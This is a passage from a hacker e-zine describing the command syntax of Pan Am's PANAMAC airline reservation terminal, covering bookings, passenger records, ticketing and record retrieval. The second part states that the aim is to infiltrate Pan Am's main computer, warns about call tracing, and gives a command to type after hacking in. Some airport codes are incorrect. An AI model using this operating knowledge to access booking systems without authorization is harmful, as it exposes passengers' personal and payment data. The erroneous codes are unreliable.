  2340. >S PA 90 / 01JAN LAX
  2341.  
  2342. S - Code for schedule
  2343. PA90 - Carrier code & flight number
  2344. / - A slash as a separator
  2345. 01JAN - Departure date from boardpoint
  2346. LAX - is the broad point.The three letter airport code
  2347.  
  2348. Output will be:
  2349.  
  2350. SPA90/1JANLAX
  2351. LAX   JFK    ZRH     STR    TXL
  2352.       1839   0930*1  1210*1 1400
  2353. 1030  2015   1135*1  1255*1  
  2354. [more]       
  2355. Flight 90 departs Los Angeles (LAX) at 1030 and arrives New York (JFK) at
  2356. 1839,leave New York at 2015, arrives Zurich at 0930 the next day because the
  2357. (*1) indicate it then leaves Zurich at 1135 that morning arrives in 
  2358. Stuttgart (STR) 1200 ... and so on.             .
  2359.  
  2360. Retrieving Itinerary
  2361. --------------------
  2362. It is sometimes necessary to view the booking. This is done by using the
  2363. "*" key on the right top of the keyboard.(THE DISPLAY KEY)
  2364. Then type in "I" for itinerary.
  2365.  
  2366. >* I 
  2367.  
  2368. Response will look something like this:
  2369.  
  2370. 1 PA 90 P 13DEC JFKFRA HS3 600 1200
  2371. 2 PA 95 Y 15DEC JFKFRA HS3 700 1300
  2372.  
  2373. [and so on ....]
  2374.  
  2375. [more]       Cancelation :
  2376. -----------
  2377. To cancel the booking in line 2 from above example enter:
  2378.  
  2379. >X 2
  2380.  
  2381. This will cancel the second segment. The Panamac assumes that the flight 
  2382. cancelled is going to be replace by another..so therefore the next flight
  2383. one books will become the second segment automatically.
  2384.  
  2385. Response:
  2386.  
  2387. NEXT REPLACES 2
  2388. FLT SEG RELATED FACTS HAS BEEN CANCELED
  2389.  
  2390. To cancel multiple itinerary just enter Function Key  "XITN"
  2391.  
  2392. Response:
  2393.  
  2394. ITIN CNLD
  2395.  
  2396. [more]       Alternate Method: Segment Entries 
  2397. ---------------------------------
  2398. Sometimes the display is not necessary if you know the flight number,
  2399. Origin - Destination ,CLASS, date, # of seats.This is done by entering
  2400. whats called a "Flight Segment"...so if the flight is available then
  2401. Panamac will confirm the seats to you.
  2402. The "0" key on the keyboard is the "SEG" key.
  2403.  
  2404. For example if you wanted to book 4 seats from Newyork (JFK) to London's
  2405. Hethrow Airportt(LHR) in Premium First Class (P) on 3rd July  FLIGHT 90
  2406. The sales agent would enter: 
  2407.  
  2408. >0 PA 90 P 3JUL JFKLHR NN4
  2409.  
  2410. The "0" is the SEGment Identifier.The NN4 means you need 4 seats.
  2411.  
  2412. Erasing all Flights booked:
  2413. ---------------------------
  2414. To ignore all flights booked.The sales agent would enter the IGNORE TRASACTION
  2415. Function Key.This is the key displayed as "IGN".The key is located fifth
  2416. from the right side of the function keys.
  2417. [more]       
  2418. >I 
  2419.  
  2420. response:
  2421.  
  2422. ALL TRANSACTIONS IGNORED  
  2423.  
  2424.          
  2425.                               Part IV
  2426.                               -------
  2427. Single Connections:
  2428. ------------------
  2429. One has to understand in this that sometimes direct connections are not       
  2430. available and therefore a second location must be used.                     
  2431. There are also second degree connection(also known as double connections)
  2432. In this example, an availability request between LAX(los Angeles) and JFK
  2433. (John F. Kennedy N.Y) requires a connection at a single city. It would look
  2434. like this:
  2435.  
  2436. >A 20APR LAXJFK P [This is just an eg. In reality there is a connection]
  2437.  
  2438. [more]       Output:
  2439.  
  2440. SVC NOT AVAILABLE IN THE SYSTEM
  2441. %2 or #2
  2442.   
  2443. This response obviosly means that there  is no connection going between
  2444. these two points.But after that you may get a percent followed by the month
  2445. or a number sign followed by the year. This (%) means that the service is going
  2446. to be offered in 2 months in this case or same applys for the year which is the
  2447. (#).
  2448.  
  2449. Therefore the agents have to know how to connect flights. They do supply them a
  2450. connection availablity chart on the side.     
  2451. So lets say (just as an eg.) that there is a direct connection from the 
  2452. airport in San Francisco(abb. SAN) to JFK and theres also a connection between
  2453. SAN to LAX.Then obviously SAN is used as a connecting airport.Therefore the
  2454. agent would enter:
  2455.   
  2456. >A 20APR LAXJFK P / 1 SAN 100 / 1
  2457.  
  2458. A 20APR LAXJFK P - This is a regular entry[See above for more on it]
  2459. [more]        /  - This slash has to be be there a separator(compulsory).Also shows
  2460.       connection is to be made somewhere 
  2461.  1  - O.k this will be different as in 3 cases below:
  2462.       1 - When you are sure that Pan am operates that particular route.
  2463.       2 - When sure that Pan am does not travel that route or 
  2464.       3 - When not sure which one travels that route.
  2465.  SAN  - This is the first connector.
  2466.  100  - Minimum connection time allowed at the airport.
  2467.  /  - Second slash as a separator also compulsory
  2468.  1  - This entry is for the airline you are connecting to in this case its
  2469.       Pan Am.Use the third entry chart provided in the above eg.
  2470.  
  2471. Second Degree Connection[DOUBLE CONNECTIONS]:
  2472. -------------------------------------------
  2473. All one must do in this case is just add the another connection after the
  2474. single connection in the same form.So therefore in the above case if one wants
  2475. to go from LAX to JFK .He would have to go from:
  2476.  
  2477. LAX --> SAN -->[another connector airport] --> final destination JFK
  2478. --------------------------------------------------------------------
  2479.  
  2480. [more]       NOTE: PANAMAC cannot construct connections at a city if it entails connections
  2481. bettween different airports, i.e it cannot construct a connection if the 
  2482. arrival is not LaGuardia(LGA) and departures is from JFK or arrive at CDG 
  2483. and depart ORY .....Just imagine the havok it would create if one could do that
  2484. ?
  2485.  
  2486. Flight Information:
  2487. ------------------ 
  2488. PANAMAC provides the capability to display Flight/Arrival Departure Info
  2489. more commonly known as "FLIFO".FLIFO may be requested from the entire sequence
  2490. or for the selected broadpoint in an entry:
  2491. For example:
  2492.     
  2493. >2 PA 50  F 2APR MCO
  2494.  
  2495. 2 - This is the FLIFO action code 
  2496. PA 50 - is the flight number  
  2497. F - This is the letter used for request departure/arrival info from selected
  2498.     city.
  2499. 2 APR - The date of the departure.
  2500. MCO - is the broad point
  2501. [more]       
  2502. Output will be:
  2503.  
  2504. 2 PA50F 2APR MCO
  2505. /MCO OFF 1529 MIA IN 1611 AN ON TIME ARRIVAL
  2506. /MIA OFF 1847 LHR IN 0733
  2507.  
  2508. This first entry would read as follows: Pan Am flight PA 50 departed at 
  2509. 1529 from MIA and arrived at 1611 - Will indicate on time and so on.
  2510.  
  2511. To request FLIFO for a selected broad point, Enter
  2512.  
  2513. 2 PA50 A 4DEC LHR 
  2514.  
  2515. A - This is the request for ARRIVAL/DEPARTURE info at the city in entry
  2516. 4 DEC - The arrival date
  2517. LHR - London Hethro Airport which is the arrival city.
  2518.  
  2519. Output:
  2520.    
  2521. 2 PA50 A 4DEC LHR
  2522. [more]       /MIA OFF 1847 IN 0733
  2523. /LHR OFF 1150 FBU IN 1488
  2524.  
  2525.                              Part V
  2526.                              ------
  2527.  
  2528. Open Flights:
  2529. -------------
  2530. Often people who are not sure (or not stable:=)) will keep there flight open.
  2531. This has to be instructed into the Panamac.
  2532.  
  2533. Suppose the agent has made an entry of:
  2534.  
  2535. >1 PA 56 P 19APR LAXJFK HS1 1200 1600
  2536.  
  2537. The HS1 means that he has booked 1 seat as explained above also.
  2538. Here in the example the passenger wants a round trip ticket first class
  2539. an "open" return.Therefore it would be:        
  2540.  
  2541. >0 PA 56 P JFKLAX QQ1
  2542.  
  2543. [more]       0 - Is the segment id (actually for the open)
  2544. PA - the ailine code
  2545. 56 - is the flight number
  2546. P - is the class
  2547. QQ1 - This is the action code.Compulsory for the open flight booking
  2548.  
  2549. Response:
  2550.  
  2551. 2 PA 56 P JFKLAX QQ1
  2552.  
  2553. This has actaully booked a round trip ticket from JFK - LAX "Open"
  2554.  
  2555. Schedule Displays:
  2556. ------------------
  2557. Sometimes it is necessary to display which airlines fly a particular route
  2558. when not sure.                                                           
  2559. Suppose the agent wanted to find out the all the airline that travel at a
  2560. particular date from LAX to JFK then the entry would be:
  2561.  
  2562. >S 19APR LAXJFK  A
  2563.  
  2564. [more]       S - Entry for the (S)chedule
  2565. 19APR - Date
  2566. LAXJFK - Self exp.
  2567. A - Time ,here A.M (could be also P for P.M or N for noon)
  2568.  
  2569. Output:
  2570.  
  2571. 19APR-SUN-
  2572. 1TW 747 FYBQM  LAXJFK 1200 1400 73S 0 111
  2573. etc...
  2574. etc...
  2575.  
  2576. In cases where theres is service only once or twice a week between 2 cities,
  2577. you might have to make more than one entry to request a schedule display.
  2578.  
  2579. Eg:
  2580.  
  2581. >S 1APR LHRSAN 
  2582.  
  2583. (Do not enter time because you want  24 <--day-->24 explained later)  
  2584.  
  2585. [more]       Output:
  2586.  
  2587. NO MORE FOR DISPLAY LHRSAN
  2588.  
  2589. o.k this mean that there is no service between these 2 points on the day
  2590. requested.O.k the PANAMAC scans this 24 hours before and 24 hours after
  2591. the date and time.This means that it has already scanned 3 days.So the next
  2592. entry would be:
  2593.  
  2594. >S 3FEB LHRSAN
  2595.  
  2596. But if there is no flight offered between the 2 points then the system would 
  2597. reply:
  2598.  
  2599. SVC NOT IN SYS 
  2600.  
  2601. Arrival not Known(ARNK)
  2602. -----------------------
  2603. Suppose a passenger was flying from LAX to JFK then he/she decides to take a 
  2604. bus from JFK to maybe CVA (Cincinati) then from there return to LAX. This would
  2605. be considered "Arrival Not Known" (ARNK). Lets say a passenger booked a flight
  2606. [more]       from LAX to JFK 
  2607.  
  2608. 1 PA 747 Y 10APR LAXJFK HS3 1200 1600
  2609.  
  2610. His route from JFK to CVA is not known. Therefore this will require the ARNK 
  2611. function key. The entry would be:
  2612.  
  2613. >0 A (or the ARNK function key)
  2614.  
  2615. Output:
  2616.  
  2617. 2 ARNK
  2618.  
  2619. Then lets assume that you have booked a return flight from CVA back to LAX then
  2620. if you list your Itinerary it would look like:
  2621.  
  2622. 1 PA 747 Y 10APR LAXJFK HS3 1200 1600
  2623. 2 ARNK
  2624. 3 PA 745 Y 20APR CVALAX HS3 1700 2100
  2625.  
  2626. Inserting Segment Entries:
  2627. [more]       --------------------------
  2628. Mant times its necessary to Insert Segment while booking flights. Suppose a 
  2629. person is flying from Albany (ALB) to Miami (MIA) and back. His segment would 
  2630. look like:
  2631.  
  2632. 1 PA 747 B 5ARP   ALBMIA HS1 100 445
  2633. 2 PA 747 B 10APR  MIAALB HS1 1200 1545
  2634.  
  2635. Here the passenger is sure that he will return back to ALB on the 10 of APR no
  2636. matter what. Now he may proceed to book the rest of the mid flight he wishes to
  2637. take. So therefore after landing in Miami he wishes to fly to Orlando.Its 
  2638. airport code is MCO for Mc Coy Int. Now the sales agent has to make insert a 
  2639. segment after the first one.
  2640.  
  2641. Here is how it done:
  2642.  
  2643. >/  1  [ Means Insert after segment #1]
  2644.  
  2645. / - Symbol used to specify "Insert After Segment" Use the "/" or "IAS" key
  2646. 1 - The Segment #.
  2647.  
  2648. [more]       The Panamac will respond  with " NEXT FOLLOWS 1 ". This indicates that your 
  2649. next entry will be after 1. After Inserting segments a "*I" is necessary to 
  2650. renumber the segs. Also if you want to insert a segment before 1 then enter
  2651. (/ 0).
  2652.  
  2653.  
  2654.                               Part VI
  2655.                               ------- 
  2656. Inputing Name Entries:
  2657. ----------------------
  2658. After the flights have been booked the second part is to input all the names
  2659. of the persons who are travelling.   
  2660. O.k lets say 3 people were travelling together (Tom,Bill,Cathy and assuming 
  2661. that their family name is Doe)   
  2662. The entry that is made into the Panamac would be as follows:
  2663.  
  2664. > -4  DOE / BILL MR / CATHY MRS / TOM MSTR
  2665.  
  2666. " - "  - The name entries has to start with a dash.
  2667. 3 - Is the number of people travelling
  2668. DOE - Family name
  2669. [more]       /  - slashes are compulsory to separate names 
  2670. BILL MR - bill first name and Mr. is self exp etc..
  2671.  
  2672. **Note SPACING IS NOT NEEDED **
  2673.  
  2674. The good thing about the Panamac is that the agent can assign up to 17 titles
  2675. to person which are aleardy hard core programmed:
  2676.  
  2677.   COL.
  2678.   GEN.
  2679.   DR. 
  2680.   LCDR.
  2681.   CPT.
  2682.   LTCOL.
  2683.   MR.
  2684.   MRS.
  2685.   MS. 
  2686.   STR.
  2687.   MISS.
  2688.   LT.
  2689.   SGT.
  2690. [more]         ADM.
  2691.   MAJ.
  2692.   REV.
  2693.   CDR.
  2694.  
  2695. Yes Pan Am carries more military personnel than anyother airlines which by the
  2696. way is a true fact. All other titles are just spelled out.
  2697.  
  2698. The name entries are counted after the first "/" for the NN3 in our case.
  2699. ( NN3 as mentioned above means Needed 3)
  2700.  
  2701. However there is an easy to do this by using the "End Item" key which comes
  2702. out on the screen as an equal sign with a vertical bar across it. Its just
  2703. like the IBM ACII VALUE 216. Therefore intread of entering (<C/R>) the agent
  2704. would just use this key and continue his/her entries for eg:
  2705. Use "!" at home.
  2706.  
  2707. >-1SMITHS/JOHN MR  @-1JOHNSON./CATHY MRS    
  2708.  
  2709. The "@" represents the "End Item" Key only in our case.
  2710.  
  2711. [more]       Infant Names:
  2712. -------------
  2713. O.k Infant names are not booked into the Panamac but only entered. Infant   
  2714. entries are ignored by stating it.This is done by entering a "I/".           
  2715. Then the # of the Infant eg.
  2716.  
  2717. >-I / 1 JOHNSON / TWEETY MISS
  2718.  
  2719. Item Number / Passenger Number :  
  2720. --------------------------------
  2721. Every persons are assigned an Item and Passenger number. Well it would be more
  2722. correct to say passengers.
  2723. Lets look at this entry:
  2724.  
  2725. -2SMITH/TOMMR/KATHYMS@-3JOHNSONS/DAVEMR/MICHELLEMS/JODYMRS
  2726.  
  2727. Now to display the name field the agent would enter "*N" 
  2728.  
  2729. Output:
  2730.  
  2731. 1.2SMITH/TOMMR/KATHYMS 3.3JOHNSONS/DAVEMR/MICHELLEMS/JODYMRS
  2732. [more]       
  2733. Here 1.2 means - 1 is the Item Number assigned and 2 is the number of the 
  2734. passengers etc.
  2735. There is a reason why the Item numbers is not consecutive. Its because there 
  2736. are 2 names in the first entry then obviously 3 follows as the next item number
  2737. . Also in this case the infant entries are also assigned a number.
  2738.  
  2739. Changing name entries:
  2740. ----------------------
  2741. Sometimes its necessary to change names in the entries.This is done by the
  2742. "Change" key  then just retyping the whole entry example:
  2743.  
  2744. 1.2SMITHS/JOHBMR/MARYMRS 
  2745.  
  2746. To chnage "Johb" to "John" the agent would enter:
  2747.  
  2748. -1 (Change key) 2SMITHS/JOHNMR/MARYMRS 
  2749.  
  2750. Deleting entries is very simple.All the agent has to do is enter the Item # 
  2751. and the Change Symbol (By the way the change symbol looks a square and
  2752. diagonals crossed in it.) and then press enter. From home you may use the "*"
  2753. [more]       and will work the same. So how does one delete one name from the an entry. That
  2754. question I will leave up to you guys to figure out.(Hint: Use the Passenger
  2755. number) 
  2756.  
  2757. Inserting entries can be done in almost the same way by entering the 
  2758. passenger number then the entry eg:
  2759.  
  2760. >-/1 -SMITH/CATMR
  2761.  
  2762. The first slash means "Enter after"..In our case the passenger #1.
  2763.  
  2764.  
  2765.                              Part VII
  2766.                              --------
  2767.  
  2768. Completing the Passenger Name & Record (PNR):
  2769. ---------------------------------------------
  2770. The whole booking is not yet complete. The sales agent still have to fill three
  2771. important entries to complete the PNR.These are:
  2772.  
  2773. 1) By who was the booking RECEIVED(passenger,militaty,T.agency,Company etc.)
  2774. [more]       2) The TELEPHONE abb. output is "FONE"
  2775. 3) When the TICKETS will be issued 
  2776. 4) Remarks
  2777. 5) The age of child if there's one travelling 
  2778.  
  2779. The first three are mandatory to complete the PNR. Numbers 4 & 5 are optional 
  2780. but the agents are encouraged to fill them out just for the records.
  2781. lets take a looks at the three mandatory ones. This article wont go over the   
  2782. optional ones.
  2783.  
  2784.     RECIEVED:
  2785.     ---------
  2786. This field as stated clearly above identifies the party who made the booking.
  2787. The characters cannot exceed over 19.The entry should always begin with a
  2788. "6".This hardcored to interpret the recieved entry.Then comes the name of the 
  2789. person. For example:
  2790.  
  2791. >6 MR DAVIS 
  2792.  
  2793. The title always has to come first in case unlike inputing name entries.     
  2794. Lets say if Mr. Davis worked for the American Travel Agency.Then the entry
  2795. [more]       is specified as follows:
  2796.  
  2797. >6 MR DAVIS/AMERICANTR 
  2798.  
  2799. To Display the Passenger Data - Use "* P"
  2800. And the Output of the Eg. above would look like: 
  2801.  
  2802. RCVD/RLOC-MR DAVIS/AMERICANTR
  2803.  
  2804. RCVD - Received
  2805. RLOC - Record Locater  and then the name.
  2806.  
  2807. Changing these entries is done by the CHANGE key using the same principal  
  2808. of changing name entries.In this case use the field "6" then input change
  2809. symbol then retype the name.
  2810.  
  2811.  
  2812.     TELEPHONE:
  2813.     ----------
  2814. The harcored field used here is "9" not "6". 
  2815. This information is entered by first typing a 9 then the "Source Of Booking"
  2816. [more]       (SOB) [See table provided for this entry]
  2817. Then a mandatory "*" sign. The SOB relates to the 6th field as we will see.
  2818. Then comes the Phone number.
  2819. If a passenger (D) booked a flight the letter "H" for Home or "B" is followed
  2820. by the telephone number and if its an agency/commercial/Interline then the 
  2821. name is used.
  2822.  
  2823.                             S.O.B Table:
  2824.                             ------------
  2825.         Direct (Passenger) - 9 D *     Military        - 9 G *
  2826.         Government         - 9 G *     Commercial      - 9 C *
  2827.         Travel Agent       - 9 A *     Interline       - 9 I *
  2828.  
  2829. Lets say you booked a flight and your phone number was 7185551234 and that was
  2830. your business number, the Entry made would be:
  2831.  
  2832. >9 D *  718/5551234 B
  2833.  
  2834. If the "*P" is invoked then it would display :      
  2835.  
  2836. RCVD/RLOC -MR DAVIS
  2837. [more]       FONE-NYC-A 718/5551234 B
  2838.  
  2839.  
  2840. The "FONE" serves to indicate the Telephone field. The the NYC has nothing to 
  2841. do with the NPA of the passengers phone number but it indicates the city 
  2842. location of the Panamac set where the booking was made. The "A" after the NYC 
  2843. is taken from the S.O.B table.
  2844.  
  2845. Passenger Relating:
  2846. -------------------
  2847. The first entry in the FONE field always belongs to the person/company/
  2848. Travel agency etc in the RCVD field. You can enter additional phone numbers 
  2849. using the same format as the first FONE entry. On additional entries,you must 
  2850. specify which passenger or passengers the phone number is for. This is done by
  2851. including in the FONE entry the PASSENGERS NAME NUMBER of the person(s)
  2852. who can be reached at that phone. This proccess is called PASSENGER RELATING
  2853.  
  2854. Lets say we have the entry:
  2855.  
  2856. 1.2SMITH/JOHNMR/MARYMRS  
  2857. 1 PA 56 B 19APR JFKLAX HS2 600 1000 
  2858. [more]       RCVD/RLOC-AMERICAN TR. AGENCY
  2859. FONE-NYC-A 718/555-1234 H
  2860.  
  2861. The Smiths, John  & Mary have the same home fone number.Therefore passenger
  2862. 1-2 have the same #s.This has to be specified into the PANAMAC by:
  2863.  
  2864. >9 1-2 A*  718/555-4321 H
  2865.  
  2866. To display NAME,ITINENARY,RCVD AND FONE at the same time enter:
  2867.  
  2868. >*R (Record)
  2869.  
  2870. Output:
  2871.  
  2872. 1.2/SMITH/JOHNMR/MARY COL
  2873. 1 PA 56 B 19APR JFKLAX HS2 600 1000
  2874. RCVD/RLOC-AMERICAN TR. AGENCY
  2875. FONE-NYC-A 718/555-1234 American Tr.Agency
  2876. 2.1-2 NYC-A 718/555-4321 H
  2877.  
  2878. etc...
  2879. [more]       
  2880. Changing entries is a simple task. Lets assume the sales agent wants to change
  2881. the first FONE entry which is for the Travel Agency.The command would be:
  2882.  
  2883. >9 1 (Change Symbol) A*  [FONE number & and the name of the agency]        
  2884.  
  2885. 9 - fone entry
  2886. 1 - First entry.(2.)would be the second FONE entry which is the Passenger home 
  2887.     fone number.( If there was a third entry it would start with (3.) and so 
  2888.     on..
  2889. A* - From  SOB
  2890.  
  2891. Deletion of the entries I will leave you to figure out.
  2892.  
  2893. Address Entries & Payment:
  2894. --------------------------
  2895. The Address entries and the form of payment are included in FONE entry as 
  2896. well. This was the Info is stored in the PNR until the time of ticketing.
  2897.  
  2898.  
  2899. Address: [Use same format]
  2900. [more]         
  2901. >9 1-2 C* 42-95 ELM STREET / FLUSHING N.Y 10011 
  2902.  
  2903. Payment:
  2904.  
  2905. >9 D * AX 1234 567 11111 EXP 9/90 MR DAN DAVIS 
  2906.  
  2907.  
  2908. Ticket Entries:
  2909. ---------------
  2910.  
  2911. The Entries in the Ticketing field tell us if the passengers already has a     
  2912. ticket or when and how its going to be issued.(Mail etc.) or when its going to
  2913. be cancelled.A ticketing code is issued for these situations:
  2914.  
  2915.                         Ticket Codez
  2916.                         ------------
  2917.          W - Here ticket will be issued on the date entered. Passenger will  
  2918.              pick it up on that date.
  2919.          U - The ticket is mailed here(TBM) on date entered
  2920.          Q - Here the ticket will be given by the travel agency on date entered
  2921. [more]                O - Ticketed
  2922.  
  2923. The field used here is "7" hardcored for Ticketing purposes.
  2924.  
  2925. Typical entry:
  2926.  
  2927. >7 W APR19
  2928.  
  2929. Usually one day after is added to APR19 so that passenger has the whole day
  2930. to purchase the ticket. The entry then would look like:
  2931.  
  2932. >7 W APR20 * APR 19
  2933.  
  2934. The "*" is mandatory.
  2935.  
  2936. Mailing:
  2937. -------
  2938. Lets look at an example of TBM:
  2939.  
  2940. >7 U 19ARP * CK FOR CHECK
  2941.  
  2942. [more]       This is entered when waiting for the passengers check to arrive. On 19APR its 
  2943. checked for arrival. If arrived then the tickets are mailed. If check is not 
  2944. received then tickets are not mailed.
  2945.  
  2946. If the payment is made by a Credit Card then entry is:
  2947.  
  2948. >7 U 19APR * CC
  2949.  
  2950. This agent will refer to the fone field where the CC info is stored. Here the 
  2951. ticket is mailed on the date issued.
  2952.  
  2953. Outside U.S travel agencies are given a Ticket Time Limit. The entry is:
  2954.  
  2955. >7 Q 5MAY
  2956.  
  2957. When showing PNR ticketed with the letter "O". Its not necessary to enter 
  2958. a date, as the Panamac already enters it that the reservation is being ticketed
  2959. Enter:
  2960.  
  2961. >7 O [assume that the date today is 5may]
  2962.  
  2963. [more]       PANAMAC will display:
  2964.  
  2965. TKT-O 17APR NYC  000 [SINE OF THE AGENT WHO MADE THE ENTRY]  
  2966.  
  2967. TKT-O - IS THE TICKET CODE
  2968. 17APR - TODAYS DATE
  2969. MYC - PANAMAC SET LOCATION
  2970. 000 - SEPARATOR
  2971. [  ] - SINE OF THE AGENT
  2972.  
  2973. If all passengers are having thier tickets issued at the same time and place,
  2974. passenger relating is not necessary. But, if the passengers have different 
  2975. dates or ticketing arrangements then the entries must be made separately and 
  2976. Passenger Name Related.
  2977.  
  2978. For eg. Assume there are 3 passengers on the PNR. Passenger 1 and 2 will call 
  2979. for their tickets at the Pan Am office and June 3. Passenger 3 wants his ticket
  2980. mailed on June 6 and will pay by personal check. The entries are:
  2981.  
  2982. >7 1-2 W 3JUN
  2983. >7  3 U 6JUN * CK FOR CHECK
  2984. [more]       
  2985. Output: 
  2986.  
  2987. TKT-1-2 W03JUNNYC000[SINE OF AGENT] 2.3 U0JUNNYC000[SINE OF AGENT] CK FOR CHECK
  2988.  
  2989. Here the 1-2 is the first entry related to the passengers 1 & 2 and 2.3 is the 
  2990. second entry related to passenger 3
  2991. NYC - location of P.set
  2992.  
  2993. Change/Delete :
  2994. ---------------
  2995. Suppose the display for the ticket field was:
  2996.  
  2997. TKT-W08APRLAX000BS
  2998.  
  2999. Here the ticket will be issued on the 8th of APR. The Panamac set is located
  3000. in LAX(Los Angeles). Also after the sepater (000), the BS is just an example
  3001. of a SINE of the agent.    
  3002.  
  3003. Lets assume today is 7th of APR and the passenger has come to pick it up.
  3004. The agent has to instruct the PANAMAC that its TICKETED. Therefore he/she
  3005. [more]       would enter :   
  3006.  
  3007. >7 1 (Change Symbol) O
  3008.  
  3009. Here: 
  3010. 7 - This is the field of the ticketing 
  3011. 1 - is the entry number
  3012. O - New Information
  3013.  
  3014. One has to remember that if changing related TKT entry then just enter 
  3015. Passenger Name number after the Change Symbol. Then the new Inforamtion. It may
  3016. look like "7 1 (Change Symb.) 1-2 W 19APR"
  3017. To delete an entry just enter Field , Entry # then the Change Symb.
  3018.  
  3019. End Trasaction:(ET)
  3020. -------------------
  3021. The PNR is now complete. After completing it the agent must End Transaction
  3022. (ET).This key is located as one of the function keys.
  3023.  
  3024. >ET
  3025.  
  3026. [more]       Output:
  3027.  
  3028. A OK 4SW#32G
  3029.  
  3030. The 4SW#32G is called the RAD NUMBER or RECORD LOCATER or PNR ADDRESS.
  3031. After Ending Trasaction the PANAMAC will send a message to all the airline
  3032. in the Itinenary advising them of the flights the agents have booked/requested
  3033. and name of passenger. 
  3034.  
  3035. SHELL PNRS
  3036. ----------
  3037. Some records like travel agencie's accounts, corporate accounts and thier FT 
  3038. number, Tel #, Address etc. have to be stored
  3039. permanently in the PNR. Therefore Panamac has what called SHELL PNRs.
  3040. Here file will become a permanent and reusable record.
  3041.  
  3042. A shell PNR can be retrieved by the account number, Telephone number and       
  3043. ARC (Airline Reporting Corporation) or IATA(International Air Transport      
  3044. Association). The ARC/IATA use last 5 Digits numeric plus check digit 
  3045. The entry to display a shell PNR before beginning normal PNR creation
  3046. begins with the letters "RP" then a "*" then comes the Account Number.
  3047. [more]       Example:
  3048.  
  3049. >RP*7183589901 
  3050.  
  3051. Ouput would be:
  3052.  
  3053. NYC PA A QH 24FEB88 2034
  3054. NO NAMES
  3055. NO ITIN
  3056. FONE-NYC-A 718/358-9901/*ARC 413453
  3057. 2.NYC-A AMERICAN
  3058. TKT-024FEBNYC000BS DKIR
  3059. RMARS-*
  3060.  
  3061. The Itinenary may now be booked and the PNR completed as usual. Shell PNRs
  3062. may also be retrieved using the following entries:
  3063.  
  3064.    ARC/ATC # - RP*ATC494340 [use last 5 numbers numeric plus check digit]
  3065.    IATA # - RP*ITA945934 [Also use last 5 numeric plus D.C]
  3066.    Account Code Number - RP*ACN7734 (In some countries only]
  3067.  
  3068. [more]       Shell PNRs can be merged with PNRs by just entering a "M" after the RP.
  3069.  
  3070. Retreiving a PNR: 
  3071. -----------------
  3072. After the sales agent completes a PNR. It is sent to the Master Computer at 
  3073. Rockleigh,N.J. To retreive a PNR  , enter "*" and the PNR ADDRESS or by using 
  3074. the flight,date and boarding off and on points and name of passenger eg:
  3075.  
  3076. >* PA 56/10AUG MIANYC - DAVIS   
  3077.  
  3078. The hyphen is mandatory here.
  3079.    
  3080. The Panamac's output will be:
  3081.  
  3082. PA56/10AUG MIANYC - DAVIS
  3083. 01 3DAVIS/TOMMR/CATHYMRS/FIFIMS  
  3084. 02 1DAVIDSON/SHASHI
  3085. :
  3086. etc
  3087. :
  3088.  
  3089. [more]       To retrieve the entries just choose the line number then enter:
  3090.  
  3091. >*2
  3092.  
  3093. The "*" has to be there or errors will ocurr. [No comand probably]
  3094. Anyway the "*2" will give you the account for Davidson.
  3095.  
  3096. To cancel a PNR you retrive just enter the "IXTN" in the fuction keys.
  3097.  
  3098. END OF PART A
  3099. -------------
  3100.  
  3101.   
  3102. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  3103. =               P/HUN Issue #3, Volume #2: Phile #6 of 11                     =
  3104. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  3105.  
  3106.  
  3107.               /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
  3108.               \                                                  /
  3109.               /   The Pan Am Airline Computers (c)1994 "PART B"  \
  3110. [more]                     \   ---------------------------------------------  /
  3111.               /                                                  \ 
  3112.               \                  By  Red Knight                  /
  3113.               /                                                  \
  3114.               \    A P/HUN Magazine Incorporation Productions    /
  3115.               /                                                  \
  3116.               \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/
  3117.  
  3118.  
  3119. Introduction & clearing up a confusion
  3120. --------------------------------------
  3121.  
  3122. Welcome to Part B of "The Pan-Am Airline Computers". I hope you have found the
  3123. first part intresting.      
  3124.  
  3125. I would like to take this opportunity in clearing up a minor confusion that
  3126. some of you may have while reading the first part of this file.
  3127.  
  3128. There are 2 types of systems I talk about in the first part which are:
  3129.  
  3130. o  Pan-Am main computer  &
  3131. [more]       o  The Panamac or PANAMAC
  3132.  
  3133. The Pan-Am main computer is used to store and view performance of the entire  
  3134. network. Pan American has 3 main computer systems to serve the surrounding
  3135. states. These are located in Florida, Washington and NewJersey. There may 
  3136. exsist one in California but we dont have enough proof to be sure.Although they
  3137. may have smaller terminals connected to these 3 major terminals and all the
  3138. material that is covered here also applies for these smaller terminals.
  3139. The Panamac are computers that are used by sales agents to book flights, give 
  3140. information and the works. Although the Pan-Am main computer can also handle 
  3141. all the tasks that the PANAMAC can. Here is what the the Pan Am network looks 
  3142. like:
  3143.  
  3144.  
  3145. Example of a simplified Pan Am Network 
  3146. --------------------------------------
  3147.  
  3148.                                  Cartridge & The Panamacs will be in the same
  3149.                                   building. Like the major Pan Am building
  3150.                                   in Manhatten in Newyork.
  3151.                              _____________________________________________
  3152. [more]       Sub Terminals               |                                             |
  3153.      |   +------ & Other                       +---- Panamac     
  3154.  +-------|-+  airlines       ______________    |---- Panamac
  3155.  | Pan-Am  |  +----------+  +              +   |---- Panamac    Sales Agents
  3156.  |  main   |--|  Sub     |--|Cartridge Area|---|---- Panamac   on each terminal
  3157.  | computer|  | Terminal |  +______________+   |---- Panamac
  3158.  +---------+  +----------+                     |---- Panamac
  3159.      |   |______________                       +---- Panamac
  3160.  Sub Terminal        Other Agencies
  3161.  
  3162.   
  3163. The cartridge area is where they insert physical cartridges for new rates
  3164. of travelling, new routes , cancellation of rountes etc. The Panamac uses
  3165. all this information supplied by the cartridge area so that the Sales agents
  3166. can answer our various questions and book us flights. The cartridge area 
  3167. contains the main program for the Panamac's to run. All the information from
  3168. the cartridge area is passed to the sub terminal then to the main computer
  3169. The surrounding states may connect to one or many sub terminals then finally
  3170. leading to the main computer. Our main purpose here is to infiltrate the main
  3171. computer where all the information is stored and has control over the entire
  3172. network that it serves. I have heard from employees that Pan-Am has the latest
  3173. [more]       on ANI equipment and therefore please proceed with caution.
  3174.  
  3175. Another thing is that when you have successfully hacked the system and you dont
  3176. get the SOM ">" prompt then type in ">SOMTERM" and hopefully you will
